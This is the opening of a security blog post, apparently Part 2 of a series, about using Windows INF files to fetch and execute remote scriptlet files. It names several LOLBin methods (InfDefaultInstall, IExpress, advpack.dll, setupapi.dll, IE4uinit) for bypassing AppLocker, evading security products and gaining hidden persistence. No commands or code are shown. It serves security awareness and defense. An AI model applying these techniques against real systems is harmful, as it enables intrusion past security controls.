Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence (Part 2)

Two weeks ago, I discussed various 'pass-thru' techniques that utilize INF files ('.inf') to 'fetch and execute' remote script component files ('.sct'). Generally, these methods could be exploited to circumvent application whitelisting (AWL) policies, such as Default AppLocker policies, evade host-based security products, and establish 'hidden' persistence. Furthermore, I highlighted additional 'fetch and execute' techniques for situational awareness and provided several defensive considerations. If you haven't done so already, I strongly recommend reviewing Part 1 [Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence] before continuing, as we will revisit some earlier topics before introducing these INF-SCT methods: - InfDefaultInstall - IExpress - IEadvpack.dll (LaunchINFSection) - IE4uinit - Revisiting Setupapi.dll (InstallHinfSection) and Advpack.dll (LaunchINFSection) - Setupapi.dll (InstallHinfSection) – InfDefaultInstall.exe During their DerbyCon 2017 presentation titled 'Evading AutoRuns,' @KyleHanslovan and @ChrisBisnett from @HuntressLabs showcased several INF-SCT techniques.